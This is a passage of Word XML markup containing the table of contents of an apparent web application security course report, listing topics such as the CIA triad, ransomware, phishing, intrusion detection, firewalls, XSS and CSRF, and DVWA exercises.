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5DC51F04" w14:textId="5FD9E785" w:rsidR="004E2155"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5553313" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E43CCD8" w14:textId="68AE5695" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553314" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IT Background</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553314 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A1665FE" w14:textId="395AB932" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553315" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Web Application Security (week 1-4)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08538DEE" w14:textId="623D64E0" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553316" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exercises &amp; Challenges</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08788FF9" w14:textId="72F4385A" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553317" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Security Threat)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1437F2E4" w14:textId="48E1AA2B" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553318" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The CIA triad.</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553318 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="416DC77B" w14:textId="333D70E4" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553319" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553319 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B8A8B6F" w14:textId="3DEFAA07" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553320" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553320 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D13DB51" w14:textId="363FC64A" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553321" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Viruses</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553321 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DD1A2E4" w14:textId="4586F6F4" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553322" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Risk Analysis)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553322 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E62F764" w14:textId="29E42B17" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553323" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 2.2 (Host Intrusion Detection and Prevention (HIDS)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553323 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65B9AD30" w14:textId="405CFE9B" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553324" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host Intrusion Detection and Prevention System (HIDS)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553324 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F360001" w14:textId="0450F2EB" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553325" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 3.2 (Web Application Firewalls)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553325 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75AAD99C" w14:textId="33EADD00" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553326" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 4.1 (XSS &amp; CSRF)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553326 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="366B3F2B" w14:textId="25750729" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553327" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553327 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B631416" w14:textId="6AE5948E" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
